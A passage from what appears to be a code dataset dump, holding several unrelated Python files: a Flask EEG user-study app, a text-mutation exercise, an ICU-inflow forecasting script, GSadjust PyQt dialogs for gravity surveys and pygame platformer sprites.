testDirectory + file\n task = subdf['task'].values.tolist()[0]\n sublist = 
(path, task)\n testTasks.append(sublist)\n\n@app.route('/')\ndef hello_world():\n global tasks\n\n makeTestTask()\n directoryList = makeTask()\n tasks = directoryList\n\n return render_template('index.html')\n\n@app.route('/test', methods=['POST'])\ndef test():\n global testTasks\n global testcount\n\n if request.method=='POST':\n print('test')\n testcount += 1\n\n if testcount >= 0:#len(testTasks):\n return render_template('index_real.html')\n else:\n return render_template(testTasks[testcount][0], task=testTasks[testcount][1], link='/testNasa')\n\n@app.route('/testNasa', methods=['POST'])\ndef testNasa():\n return render_template('NASA-TLX_test.html', link='/testRest')\n\n@app.route('/testRest', methods=['POST'])\ndef testRest():\n return render_template('rest_test.html', link='/test')\n\n@app.route('/next', methods=['POST'])\ndef next():\n global tasks\n global taskCount\n global userAnswer\n global names\n global saveCount\n\n if request.method == 'POST':\n userName = request.form.get('search')\n if userName != None:\n print('Rest')\n startRecording(userName)\n injectMarker(0)\n userAnswer['name'] = userName\n userAnswer['value'] = {}\n\n taskCount += 1\n saveCount += 1\n if taskCount >= 2:#len(tasks):\n injectMarker(2)\n print('End')\n print(userAnswer)\n return render_template('end.html', link='/save')\n elif saveCount == 1:#10:\n print('Save Temp')\n print(userAnswer)\n injectMarker(2)\n taskCount -= 1\n return render_template('data_save.html', link='/save_temp')\n else:\n injectMarker(tasks[taskCount][2])\n print('VisCount', taskCount)\n print('Vis', tasks[taskCount][2])\n print(userAnswer)\n\n return render_template(tasks[taskCount][0], task=tasks[taskCount][1], link='/NASA')\n\n@app.route('/save_temp', methods=['POST'])\ndef save_temp():\n global tasks\n global taskCount\n global userAnswer\n global saveCount\n\n if request.method == 'POST':\n print('Save Temp')\n data = pd.DataFrame(userAnswer['value'])\n path = 'C:/EEG data/EuroVis/UserData/' + userAnswer['name']\n\n try:\n if not os.path.exists(path):\n os.makedirs(path)\n except OSError:\n pass\n\n dataName = 'ans_' + str(taskCount)\n data.T.to_csv(path + '/' + dataName + '.csv', encoding='CP949')\n saveCount = -1\n\n return render_template('rerun.html', link='/next')\n\n@app.route('/save', methods=['POST'])\ndef save_data():\n global tasks\n global taskCount\n global userAnswer\n\n if request.method == 'POST':\n print('Save')\n data = pd.DataFrame(userAnswer['value'])\n path = 'C:/EEG data/EuroVis/UserData/' + userAnswer['name']\n\n if taskCount == len(tasks):\n try:\n if not os.path.exists(path):\n os.makedirs(path)\n except OSError:\n pass\n\n data.T.to_csv(path + '/' + 'ans_end.csv', encoding='CP949')\n stopRecording()\n\n@app.route('/rest', methods=['POST'])\ndef rest():\n global tasks\n global taskCount\n global userAnswer\n\n if request.method == 'POST':\n injectMarker(0)\n print('Rest')\n task_split = tasks[taskCount][0].split('/')\n task_index = task_split[1] + '_' + task_split[2] + '_' + task_split[3] + '_' + task_split[4].replace('.html','')\n NASA_col = ['Mental', 'Physical', 'Temporal', 'Effort', 'Performance', 'Frustration']\n for col in NASA_col:\n userAnswer['value'][task_index][col] = request.form.get(col).replace('[POST]> ', '')\n\n return render_template('rest.html', link='/next')\n\n@app.route('/NASA', methods=['POST'])\ndef nasa():\n global tasks\n global taskCount\n global userAnswer\n\n if request.method=='POST':\n injectMarker(1)\n print('Eval')\n task_split = tasks[taskCount][0].split('/')\n 
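# tasks[taskCount][0] is a template path such as 'vis/bar/Task1/color/0.html' (filename hypothetical); the pieces below are joined into a key like 'bar_Task1_color_0'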
task_index = task_split[1] + '_' + task_split[2] + '_' + task_split[3] + '_' + task_split[4].replace('.html', '')\n\n userAnswer['value'][task_index] = {}\n ans = request.form.get('answer')\n if ans==None:\n userAnswer['value'][task_index]['Answer'] = 'Task 3'\n else:\n userAnswer['value'][task_index]['Answer'] = ans.replace('[POST]> ', '')\n\n userAnswer['value'][task_index]['marker'] = tasks[taskCount][2]\n return render_template('NASA-TLX.html', link='/rest')\n\nif __name__ == '__main__':\n app.run(debug=True)","sub_path":"EEG/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"646796145","text":"#!/usr/bin/env python3\n\"\"\"Telephone\"\"\"\n\nimport argparse\nimport os\nimport random\nimport string\n\n\n# --------------------------------------------------\ndef get_args():\n \"\"\"Get command-line arguments\"\"\"\n\n parser = argparse.ArgumentParser(\n description='Telephone',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser.add_argument('text', metavar='text', help='Input text or file')\n\n parser.add_argument('-s',\n '--seed',\n help='Random seed',\n metavar='seed',\n type=int,\n default=None)\n\n parser.add_argument('-m',\n '--mutations',\n help='Percent mutations',\n metavar='mutations',\n type=float,\n default=0.1)\n\n args = parser.parse_args()\n\n if not 0 <= args.mutations <= 1:\n parser.error(f'--mutations \"{args.mutations}\" must be between 0 and 1')\n\n if os.path.isfile(args.text):\n args.text = open(args.text).read().rstrip()\n\n return args\n\n\n# --------------------------------------------------\ndef main():\n \"\"\"Make a jazz noise here\"\"\"\n\n args = get_args()\n text = args.text\n random.seed(args.seed)\n alpha = ''.join(sorted(string.ascii_letters + string.punctuation))\n len_text = len(text)\n num_mutations = round(args.mutations * len_text)\n new_text = text\n\n for i in random.sample(range(len_text), num_mutations):\n new_char = random.choice(alpha.replace(new_text[i], ''))\n new_text = new_text[:i] + new_char + new_text[i + 1:]\n\n print(f'You said: \"{text}\"\\nI heard : \"{new_text}\"')\n\n\n# --------------------------------------------------\nif __name__ == '__main__':\n main()\n","sub_path":"10_telephone/solution1.py","file_name":"solution1.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"130326581","text":"\n\"\"\"\nFile that runs LCPS model\n\"\"\"\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport sys\n\nsys.path.append(\"Python\")\nfrom cross_validation import BlockingTimeSeriesSplitLCPS\nfrom Models_LCPS import gridsearch_LCPS, rolling_pred_LCPS, LCPSModel\n\n# load data\ndata = pd.read_csv(\"Data/data.csv\")\ndata.date = pd.to_datetime(data.date, format='%Y-%m-%d')\ndata = data.sort_values(by='date', ascending=True)\n\n# create weekday variable.\n# 0 is Monday, ..., 6 is Sunday\ndata['weekday'] = data.date.dt.weekday\n\ny = data.ICU_Inflow.values\nw = data.weekday.values\n\n# Split data set into testing and training set. 
80% in training set (arbitrary\n# choice)\n\nsplit_pct = 0.8\ny_train = y[:int(y.shape[0] * split_pct)]\ny_test = y[int(y.shape[0] * split_pct):]\nw_train = w[:int(y.shape[0] * split_pct)]\nw_test = w[int(y.shape[0] * split_pct):]\n\n\nbtscv = BlockingTimeSeriesSplitLCPS(n_splits=5)\n\n# splits_list is a list of dictionaries, where each dictionary is a fold\n# the dictionary contains the start and stop indices for the train set\n# and the start and stop indices for the validation set\nsplits_list = btscv.return_split(y_train)\n\n# first rough search for the smoothing parameter using blocktimeseries split\ngrid_1 = np.arange(0, 101, 0.5)\nopt_lambda_1, average_mae_per_par_1 = gridsearch_LCPS(y, w, splits_list, grid=grid_1)\n\nprint(opt_lambda_1)\n\n# Plot graph to inspect where low points of the mae are\nplt.plot(grid_1, average_mae_per_par_1.values(), label='MAE')\nplt.xlabel('Lambda')\nplt.ylabel('MAE')\naxes = plt.gca()\naxes.set_xlim([0, 100])\nplt.legend()\nplt.show()\n\n# More sophisticated search\n# define the grid\ngrid_2 = np.arange(3, 10, 0.01)\n\nopt_lambda_2, average_mae_per_par_2 = gridsearch_LCPS(y, w, splits_list, grid=grid_2)\n\nprint(opt_lambda_2)\n\n# compute rolling predictions based on\ny_pred = rolling_pred_LCPS(LCPSModel, y_train, y_test, w_train, w_test, t=1, gamma=opt_lambda_2)\n\n# save predictions to text file\nfilename = 'y_pred_rolling_LCPS.txt'\nwith open(filename, 'w') as file_object:\n file_object.write(str(y_pred))\n","sub_path":"Python/perform_LCPS.py","file_name":"perform_LCPS.py","file_ext":"py","file_size_in_byte":2056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"521588628","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\ngui_objects.py\n==============\n\nMinor GSadjust GUI objects for GSadjust\n---------------------------------------\n\nMajor GUI objects (tabs, table views) are in GSadjust.py. This module has primarily pop-up dialogs used to set\nnetwork adjustment settings, show gravity change over time, etc. Significant dialogs are written as classes and\ninstantiated in GSadjust.py. Minor dialogs are written as functions and called directly.\n\nThis software is preliminary or provisional and is subject to revision. It is being\nprovided to meet the need for timely best science. The software has not received final approval by the U.S.\nGeological Survey (USGS). No warranty, expressed or implied, is made by the USGS or the U.S. Government as to the\nfunctionality of the software and related material nor shall the fact of release constitute any such warranty. The\nsoftware is provided on the condition that neither the USGS nor the U.S. Government shall be held liable for any\ndamages resulting from the authorized or unauthorized use of the software.\n\"\"\"\nimport os\nimport datetime as dt\nimport numpy as np\nfrom PyQt5 import QtGui, QtCore, QtWidgets\nimport logging\n\nfrom data_objects import Datum, AdjustmentOptions\nfrom pyqt_models import GravityChangeModel, DatumTableModel\nimport a10\n\n\n\nclass AdjustOptions(QtWidgets.QDialog):\n \"\"\"\n Dialog to set network adjustment options.\n \"\"\"\n def __init__(self, survey_str, options):\n super(AdjustOptions, self).__init__()\n self.title = 'Select directory with Abs. 
g files (.project.txt)'\n self.setGeometry(50, 50, 350, 350)\n self.ao = options\n self.surveys_to_update = ''\n self.update_options = []\n self.drift_temp_chk = QtWidgets.QCheckBox('Model temperature drift, polynomial degree:')\n self.sigma_factor_chk = QtWidgets.QCheckBox('Std. dev. multiplier')\n self.sigma_add_chk = QtWidgets.QCheckBox('Add to std. dev.')\n self.sigma_min_chk = QtWidgets.QCheckBox('Minimum std. dev.')\n self.cal_coeff_chk = QtWidgets.QCheckBox('Include relative meter calibration coefficient')\n self.alpha_text = QtWidgets.QLabel('Significance level for global model test')\n self.woutfiles_chk = QtWidgets.QCheckBox('Write output files')\n self.drift_temp_edit = QtWidgets.QLineEdit(str(self.ao.model_temp_degree))\n self.sigma_factor_edit = QtWidgets.QLineEdit(str(self.ao.sigma_factor))\n self.sigma_add_edit = QtWidgets.QLineEdit(str(self.ao.sigma_add))\n self.sigma_min_edit = QtWidgets.QLineEdit(str(self.ao.sigma_min))\n self.alpha_edit = QtWidgets.QLineEdit(str(self.ao.alpha))\n self.init_ui(survey_str)\n\n def init_ui(self, survey_name):\n if survey_name is not None:\n self.drift_temp_chk.setChecked(self.ao.use_model_temp)\n self.sigma_factor_chk.setChecked(self.ao.use_sigma_factor)\n self.sigma_add_chk.setChecked(self.ao.use_sigma_add)\n self.sigma_min_chk.setChecked(self.ao.use_sigma_min)\n self.cal_coeff_chk.setChecked(self.ao.cal_coeff)\n self.woutfiles_chk.setChecked(self.ao.woutfiles)\n\n # create buttons and actions\n cancel_button = QtWidgets.QPushButton('Cancel')\n cancel_button.clicked.connect(self.close)\n current_button = QtWidgets.QPushButton('Apply to current survey (' + survey_name + ')')\n current_button.clicked.connect(self.apply_current)\n all_button = QtWidgets.QPushButton('Apply to all surveys')\n all_button.clicked.connect(self.apply_all)\n\n buttonBox = QtWidgets.QDialogButtonBox(QtCore.Qt.Horizontal)\n buttonBox.addButton(current_button, QtWidgets.QDialogButtonBox.ActionRole)\n buttonBox.addButton(all_button, QtWidgets.QDialogButtonBox.ActionRole)\n buttonBox.addButton(cancel_button, QtWidgets.QDialogButtonBox.ActionRole)\n\n grid = QtWidgets.QGridLayout()\n grid.addWidget(self.drift_temp_chk, 1, 0)\n grid.addWidget(self.drift_temp_edit, 1, 1)\n grid.addWidget(self.sigma_factor_chk, 2, 0)\n grid.addWidget(self.sigma_factor_edit, 2, 1)\n grid.addWidget(self.sigma_add_chk, 3, 0)\n grid.addWidget(self.sigma_add_edit, 3, 1)\n grid.addWidget(self.sigma_min_chk, 4, 0)\n grid.addWidget(self.sigma_min_edit, 4, 1)\n grid.addWidget(self.cal_coeff_chk, 5, 0)\n grid.addWidget(self.alpha_text, 6, 0)\n grid.addWidget(self.alpha_edit, 6, 1)\n grid.addWidget(self.woutfiles_chk, 7, 0)\n grid.addWidget(buttonBox, 8, 0)\n\n self.setLayout(grid)\n self.setWindowTitle('Network adjustment options')\n self.setWindowModality(QtCore.Qt.ApplicationModal)\n else:\n show_message('Please load a survey first', 'Network adjustment options')\n\n def set_adjust_options(self):\n if self.drift_temp_chk.isChecked():\n self.ao.use_model_temp = True\n self.ao.model_temp_degree = int(self.drift_temp_edit.text()) # read the degree from the line edit, not from the stored option value\n else:\n self.ao.use_model_temp = False\n if self.sigma_factor_chk.isChecked():\n self.ao.use_sigma_factor = True\n self.ao.sigma_factor = float(self.sigma_factor_edit.text())\n else:\n self.ao.use_sigma_factor = False\n if self.sigma_add_chk.isChecked():\n self.ao.use_sigma_add = True\n self.ao.sigma_add = float(self.sigma_add_edit.text())\n else:\n self.ao.use_sigma_add = False\n if self.sigma_min_chk.isChecked():\n self.ao.use_sigma_min = True\n self.ao.sigma_min = 
float(self.sigma_min_edit.text())\n else:\n self.ao.use_sigma_min = False\n self.ao.cal_coeff = self.cal_coeff_chk.isChecked()\n self.ao.alpha = float(self.alpha_edit.text())\n self.ao.woutfiles = self.woutfiles_chk.isChecked()\n\n def apply_current(self):\n self.set_adjust_options()\n self.surveys_to_update = 'single'\n self.accept()\n\n def apply_all(self):\n self.set_adjust_options()\n self.surveys_to_update = 'all'\n self.accept()\n\n\nclass IncrMinuteTimeEdit(QtWidgets.QTimeEdit):\n \"\"\"\n Provides a QTimeEdit that increments at some minute interval.\n\n The PyQt Time edit doesn't allow rolling the minutes over into hours, apparently. I.e., the hours and minutes\n boxes are limited to 0-60. This implements that somewhat, but one can't decrement minutes below 00 in either the\n MinuteSection or HourSection. This manifests as when at a time, e.g., 3:00, stepBy isn't called when in the\n Minute Section because time is already at 0.\n \"\"\"\n def __init__(self, time):\n super(IncrMinuteTimeEdit, self).__init__(time)\n self.step = 10\n\n def stepBy(self, steps):\n if self.currentSection() == self.HourSection:\n self.incrTime(steps)\n if self.currentSection() == self.MinuteSection:\n self.incrTime(steps)\n\n def incrTime(self, steps):\n hours = self.dateTime().time().hour()\n minutes = self.dateTime().time().minute() + steps * self.step\n if minutes < 0:\n self.setTime(QtCore.QTime(hours - 1, 60 + minutes))\n elif minutes < 60: # elif, so the roll-under branch above isn't immediately overwritten\n self.setTime(QtCore.QTime(hours, minutes))\n # QtWidgets.QTimeEdit.stepBy(self, steps * self.step)\n else:\n self.setTime(QtCore.QTime(hours + 1, minutes % 60))\n\n\ndef copy_cells_to_clipboard(table):\n if len(table.selectedIndexes()) > 0:\n # sort selected indexes into rows and columns\n previous = table.selectedIndexes()[0]\n columns = []\n rows = []\n for index in table.selectedIndexes(): # columns first, then rows\n if previous.row() != index.row():\n columns.append(rows)\n rows = []\n rows.append(index.data())\n previous = index\n columns.append(rows)\n\n # add rows and columns to clipboard\n clipboard = \"\"\n ncols = len(columns[0])\n nrows = len(columns)\n\n # add header to clipboard\n for c in range(ncols):\n clipboard += table.model().headerData(c, QtCore.Qt.Horizontal)\n clipboard += '\\t'\n clipboard += '\\n'\n\n for r in range(nrows):\n for c in range(ncols):\n clipboard += columns[r][c]\n if c != (ncols - 1):\n clipboard += '\\t'\n clipboard += '\\n'\n\n # copy to the system clipboard\n sys_clip = QtWidgets.QApplication.clipboard()\n sys_clip.setText(clipboard)\n else:\n show_message('No rows selected (Ctrl-a to select all)', 'Copy warning')\n\ndef date_method_dialog():\n \"\"\"\n Dialog to select data import method - all data into one survey, or with dates contained in a second file.\n :return: String indicating survey import type ('choose' or 'single')\n \"\"\"\n msg = QtWidgets.QMessageBox()\n msg.setIcon(QtWidgets.QMessageBox.Question)\n\n msg.setText(\"Start/end date file not found.\")\n msg.setWindowTitle(\"Specify start/end dates\")\n msg.addButton(QtWidgets.QPushButton('Choose File'), QtWidgets.QMessageBox.YesRole)\n msg.addButton(QtWidgets.QPushButton('Single Survey'), QtWidgets.QMessageBox.NoRole)\n msg.addButton(QtWidgets.QPushButton('Cancel'), QtWidgets.QMessageBox.RejectRole)\n method = msg.exec_()\n if method == 0:\n return 'choose'\n elif method == 1:\n return 'single'\n else:\n return False\n\n\ndef about_dialog():\n msg1 = 'GSadjust, a 
product of the USGS Southwest Gravity Program\\n' \\\n 'http://go.usa.gov/xqBnQ\\n\\n' \\\n 'https://github.com/jkennedy-usgs/GSadjust\\n' \\\n '
jkennedy@usgs.gov'\n QtWidgets.QMessageBox.about(None, \"GSadjust\", msg1) # about() returns None, so there is nothing to unpack\n\n\ndef vertical_gradient_interval_dialog(default_interval):\n text, ok = QtWidgets.QInputDialog.getDouble(None, \"Vertical-gradient interval\",\n \"Interval, in cm:\",\n default_interval,\n 0, 200, 1)\n if ok:\n # self.campaigndata.verticalgradientinterval = float(text)\n return float(text)\n else:\n return default_interval\n\n\ndef gravity_change_table(MainProg, table, header, full_table=False):\n \"\"\"\n Floating window to show gravity-change results\n :param MainProg:\n :param table:\n :param header:\n \"\"\"\n gravity_change_window = QtWidgets.QWidget()\n gravity_change_window.model = GravityChangeModel(table, header)\n gravity_change_window.table = QtWidgets.QTableView()\n gravity_change_window.table.setModel(gravity_change_window.model)\n\n # Create buttons and actions\n gravity_change_window.btn1 = QtWidgets.QPushButton('Copy to clipboard')\n gravity_change_window.btn1.clicked.connect(lambda: copy_cells_to_clipboard(MainProg.popup.table))\n if not full_table:\n gravity_change_window.btn2 = QtWidgets.QPushButton('Show full table')\n gravity_change_window.btn2.clicked.connect(lambda: show_full_table(MainProg))\n else:\n gravity_change_window.btn2 = QtWidgets.QPushButton('Show simple table')\n gravity_change_window.btn2.clicked.connect(lambda: MainProg.compute_gravity_change())\n\n # Locations\n vbox = QtWidgets.QVBoxLayout()\n vbox.addWidget(gravity_change_window.table)\n hbox = QtWidgets.QHBoxLayout()\n hbox.addStretch(0)\n hbox.addWidget(gravity_change_window.btn1)\n hbox.addWidget(gravity_change_window.btn2)\n vbox.addLayout(hbox)\n gravity_change_window.setLayout(vbox)\n gravity_change_window.setWindowTitle('Gravity Change')\n gravity_change_window.setGeometry(200, 200, 600, 800)\n MainProg.popup = gravity_change_window\n MainProg.popup.show()\n\ndef show_full_table(MainProg):\n MainProg.popup.close()\n table = MainProg.compute_gravity_change(full_table=True)\n header = table[0]\n tp_table = list(zip(*table[1:]))\n gravity_change_table(MainProg, tp_table, header, full_table=True)\n return\n\ndef read_start_end_dates(filename):\n \"\"\" read user input start and end dates of each campaign\n current format is\n yyyy/mm/dd hh:mn:ss yyyy/mm/dd hh:mn:ss\n yyyy/mm/dd hh:mn:ss yyyy/mm/dd hh:mn:ss\n ...\n but can be changed anytime here\n \"\"\"\n i = 0\n try:\n fh = open(filename, 'r')\n start_end_dates = []\n for line in fh:\n i += 1\n # Clean line\n line = line.strip()\n # split the line first on '/' (used in the date format),\n # then on ':' (used in the time format), and finally on whitespace\n vals = line.replace('/', ' ').replace(':', ' ').split()\n start_end_dates.append([dt.datetime(int(vals[0]), int(vals[1]),\n int(vals[2]), int(vals[3]), int(vals[4]), int(vals[5])),\n dt.datetime(int(vals[6]), int(vals[7]), int(vals[8]), int(vals[9]),\n int(vals[10]), int(vals[11]))])\n\n return start_end_dates\n except IOError:\n # if the file can't be opened, print this message and continue\n print('No file : %s' % filename)\n except ValueError:\n print('problem at line %d : check data file' % i)\n\n\ndef show_message(message, title, icon=QtWidgets.QMessageBox.Warning):\n \"\"\"\n Generic dialog to show a message, with a single 'OK' button.\n :param message: string shown in dialog\n :param title: string shown in dialog title bar.\n :param icon: Qt icon\n \"\"\"\n msg = QtWidgets.QMessageBox()\n msg.setIcon(icon)\n msg.setText(message)\n msg.setWindowTitle(title)\n 
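# exec_() shows the dialog modally and blocks until the user dismisses it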
msg.exec_()\n\n\ndef rename_dialog(old_name, new_name):\n \"\"\"\n Dialog called after renaming station in treeview.\n\n Gives the option to rename stations in the current loop, survey, or throughout the campaign.\n :param old_name: string, old station name\n :param new_name: string, new station name\n :return: integer indicating extent of station rename.\n \"\"\"\n msg = QtWidgets.QMessageBox()\n q_string = 'Rename all stations from {} to {} in...'.format(old_name, new_name)\n msg.setText(q_string)\n msg.addButton(QtWidgets.QPushButton('Campaign'), 0)\n msg.addButton(QtWidgets.QPushButton('Survey'), 0)\n msg.addButton(QtWidgets.QPushButton('Loop'), 0)\n msg.addButton(QtWidgets.QPushButton('Just this station'),0)\n msg.addButton(QtWidgets.QPushButton('Cancel'), 1)\n method = msg.exec_()\n methods = {0: 'Campaign',\n 1: 'Survey',\n 2: 'Loop',\n 3: 'Station',\n 4: 'Cancel'}\n\n return methods[method]\n\n\ndef tide_correction_dialog(MainProg):\n \"\"\"\n Dialog for choosing tide correction method: meter-supplied, Predict, Agnew, or from a file.\n :param MainProg: Main object, to be sent to tide_corrections() where the correction is applied\n \"\"\"\n msg = QtWidgets.QMessageBox()\n msg.setText(\"Select tide-correction method\")\n msg.addButton(QtWidgets.QPushButton('Meter-supplied'), 0)\n # 'Predict' not yet tested\n btn = QtWidgets.QPushButton('Predict')\n btn.setEnabled(False)\n msg.addButton(btn, 1)\n msg.addButton(QtWidgets.QPushButton('Agnew'), 2)\n msg.addButton(QtWidgets.QPushButton('From file'), 3)\n method = msg.exec_()\n tide_corrections = {0: use_meter_tide_correction,\n 1: use_predict_tides,\n 2: get_coordinates,\n 3: use_tide_time_series}\n tide_corrections[method](MainProg)\n\n\nclass SelectAbsg(QtWidgets.QDialog):\n \"\"\"\n Dialog to show absolute-gravity values from *.project.txt files. The user can select the files to import as Datums.\n \"\"\"\n def __init__(self):\n super(SelectAbsg, self).__init__()\n self.title = 'Select directory with Abs. 
g files (.project.txt)'\n self.left = 100\n self.top = 100\n self.width = 800\n self.height = 480\n self.new_datums = []\n\n self.splitter_window = QtWidgets.QSplitter(QtCore.Qt.Horizontal, self)\n self.tree_model = QtWidgets.QDirModel()\n self.tree = QtWidgets.QTreeView()\n self.table_model = DatumTableModel()\n self.table = QtWidgets.QTableView()\n\n self.init_ui()\n\n def export_and_close(self):\n for i in range(self.table_model.rowCount()):\n ndi = self.table_model.index(i, 0)\n nd = self.table_model.data(ndi, role=QtCore.Qt.UserRole)\n chk = self.table_model.data(ndi, role=QtCore.Qt.CheckStateRole)\n if chk == 2:\n self.new_datums.append(nd)\n self.accept()\n\n def closeEvent(self, QCloseEvent):\n return self.close()\n\n def init_ui(self):\n self.setWindowTitle(self.title)\n self.setGeometry(self.left, self.top, self.width, self.height)\n\n # File-tree view and model\n self.tree.setModel(self.tree_model)\n self.tree.scrollTo(self.tree_model.index(\"E:\\\\\\\\Shared\\\\\\\\\\current\\\\\\\\\\projects\\\\\\\\\\GravityDataArchive\"))\n self.tree.setAnimated(False)\n self.tree.setIndentation(20)\n self.tree.setSortingEnabled(True)\n self.tree.setWindowTitle(\"Dir View\")\n self.tree.resize(800, 480)\n\n # Buttons\n load_button = QtWidgets.QPushButton(\"Load\")\n load_button.clicked.connect(self.load_a10_data)\n ok_button = QtWidgets.QPushButton(\"Import\")\n ok_button.clicked.connect(self.export_and_close)\n cancel_button = QtWidgets.QPushButton(\"Cancel\")\n cancel_button.clicked.connect(self.close)\n\n # Button under tree view\n button_box_left = QtWidgets.QHBoxLayout()\n button_box_left.addStretch(1)\n button_box_left.addWidget(load_button)\n\n # Button under table\n button_box_right = QtWidgets.QHBoxLayout()\n button_box_right.addStretch(1)\n button_box_right.addWidget(cancel_button)\n button_box_right.addWidget(ok_button)\n\n self.table.setModel(self.table_model)\n self.tree.resizeColumnToContents(0)\n\n # Hide file size, date modified columns\n self.tree.setColumnHidden(1, True)\n self.tree.setColumnHidden(2, True)\n self.tree.setColumnHidden(3, True)\n\n # Hide column of residuals\n self.table.setColumnHidden(6, True)\n self.tree.setSelectionMode(QtWidgets.QAbstractItemView.ExtendedSelection)\n\n # Move date column to second from left\n self.table.horizontalHeader().moveSection(3, 1)\n\n # Layout\n final_layout = QtWidgets.QVBoxLayout()\n sublayout_left = QtWidgets.QVBoxLayout()\n sublayout_right = QtWidgets.QVBoxLayout()\n sublayout_left.addWidget(self.tree)\n sublayout_left.addLayout(button_box_left)\n sublayout_right.addWidget(self.table)\n sublayout_right.addLayout(button_box_right)\n left_widget = QtWidgets.QWidget()\n left_widget.setLayout(sublayout_left)\n right_widget = QtWidgets.QWidget()\n right_widget.setLayout(sublayout_right)\n self.splitter_window.addWidget(left_widget)\n self.splitter_window.addWidget(right_widget)\n self.splitter_window.setSizes([240, 560])\n final_layout.addWidget(self.splitter_window)\n self.setLayout(final_layout)\n\n self.setWindowModality(QtCore.Qt.ApplicationModal)\n\n def load_a10_data(self):\n \"\"\"\n Parses *.project.txt files in the selected paths. 
Populates the dialog table model directly.\n \"\"\"\n files_found = False\n idxs = self.tree.selectedIndexes()\n self.table_model.clearDatums()\n for i in idxs:\n if i.model().isDir(i):\n pth = str(i.model().filePath(i))\n for dirname, _, fileList in os.walk(pth):\n for name in fileList:\n if '.project.txt' in name:\n files_found = True\n d = a10.A10(os.path.join(dirname, name))\n datum = Datum(d.stationname,\n g=float(d.gravity),\n sd=float(d.setscatter),\n date=d.date,\n meas_height=float(d.transferht),\n gradient=float(d.gradient),\n checked=0)\n self.table_model.insertRows(datum, 1)\n if not files_found:\n show_message('No *.project.txt files found in the selected directories.', 'Import error')\n\n\nclass ProgressBar(QtWidgets.QWidget):\n \"\"\"\n define progress bar\n \"\"\"\n\n def __init__(self, parent=None, total=20, textmess='Progress'):\n super(ProgressBar, self).__init__(parent)\n self.progressbar = QtWidgets.QProgressBar()\n self.progressbar.setMinimum(1)\n self.progressbar.setMaximum(total)\n main_layout = QtWidgets.QGridLayout()\n main_layout.addWidget(self.progressbar, 0, 1)\n self.setLayout(main_layout)\n self.setWindowTitle(textmess)\n\nfrom tide_correction import use_meter_tide_correction, use_predict_tides, get_coordinates, use_tide_time_series\n","sub_path":"main_code/gui_objects.py","file_name":"gui_objects.py","file_ext":"py","file_size_in_byte":21746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"582743212","text":"import pygame as pg\nfrom settings import *\nfrom levelsManager import *\n\nclass Ground(pg.sprite.Sprite):\n def __init__(self, x, y, w, h, game):\n pg.sprite.Sprite.__init__(self)\n self.image = pg.Surface((w, h))\n self.image.fill(BLACK)\n self.rect = self.image.get_rect()\n self.rect.move_ip(0,-20)\n self.rect.x = x\n self.rect.y = y\n\n self.game = game\n\n\nclass Spikes(pg.sprite.Sprite):\n def __init__(self, x, y, w, h, game):\n pg.sprite.Sprite.__init__(self)\n self.image = pg.Surface((w, h))\n self.image.fill(RED)\n self.rect = self.image.get_rect()\n self.rect.x = x\n self.rect.y = y\n self.game = game\n\n def update(self):\n self.mort()\n\n def mort(self):\n self.hit = pg.sprite.spritecollide(self, self.game.player_sprite,False)\n if self.hit:\n self.game.new()\n\nclass Falling_traps(pg.sprite.Sprite):\n\n def __init__(self, x, y, w, h, bounderies, game):\n pg.sprite.Sprite.__init__(self)\n self.image = pg.Surface((w, h))\n self.image.fill(BLUE)\n self.rect = self.image.get_rect()\n self.rect.x = x\n self.rect.y = y\n self.isFalling = False\n self.game = game\n self.w = w\n self.bounderies = bounderies\n\n def update(self):\n if self.rect.x < self.game.player.pos.x < self.rect.x + self.w or self.rect.x < self.game.head.rect.x < self.rect.x + self.w:\n self.isFalling = True\n\n self.fall()\n self.mort()\n\n def fall(self):\n if self.isFalling:\n self.rect.y += FALLSPEEDTRAP\n\n if self.rect.y > self.bounderies:\n self.rect.y = self.bounderies\n\n\n\n def mort(self):\n self.hit = pg.sprite.spritecollide(self, self.game.player_sprite,False)\n if self.hit:\n self.game.new()\n\nclass Porte(pg.sprite.Sprite):\n\n def __init__(self,x,y,game):\n pg.sprite.Sprite.__init__(self)\n self.game = game\n self.x = x\n self.y = y\n self.w = 40\n self.h = 100\n self.scene = Scene\n\n self.image = pg.Surface((self.w,self.h))\n self.image.fill(BLUE)\n self.rect = self.image.get_rect()\n self.rect.x = x\n self.rect.y = y\n\n def update(self):\n hit = pg.sprite.spritecollide(self, 
self.game.player_sprite,False)\n if hit:\n self.scene.currentLevel += 1\n print(self.scene.currentLevel)\n self.loadNewLevel()\n\n def loadNewLevel(self):\n self.game.new()\n\n\nclass Laser_horiz(pg.sprite.Sprite):\n\n def __init__(self, x, y, w, h, game):\n pg.sprite.Sprite.__init__(self)\n self.game = game\n self.x = x\n self.y = y\n self.w = 40\n self.h = 100\n\n self.image = pg.Surface((self.w,self.h))\n self.image.fill(BLUE)\n self.image = pg.Surface((w, h))\n self.image.fill(ORCHID)\n self.rect = self.image.get_rect()\n self.rect.x = x\n self.rect.y = y\n self.game = game\n self.w = w\n self.baselaser = x\n\n def update(self):\n hit = pg.sprite.spritecollide(self, self.game.player_sprite,False)\n self.rect.x += LASER_SPEED\n self.contact()\n\n\n\n def contact(self):\n\n if self.rect.x == 1280:\n self.rect.x = self.baselaser\n\n\n self.hit_player = pg.sprite.spritecollide(self, self.game.player_sprite,False)\n\n if self.hit_player:\n self.game.new()\n\n self.hit_sprites = pg.sprite.spritecollide(self, self.game.platforms_sprite, False)\n\n if self.hit_sprites:\n self.rect.x = self.baselaser\n","sub_path":"ISN-Projet-Final-master/sprites.py","file_name":"sprites.py","file_ext":"py","file_size_in_byte":3675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"156402194","text":"# usage: need to change the number_of_features to proper values, model_tuned should not have the line of running it\nimport warnings\n# warnings.simplefilter(action='ignore', category=Warning)\n\nfrom multiprocessing import set_start_method\n# set_start_method('forkserver', 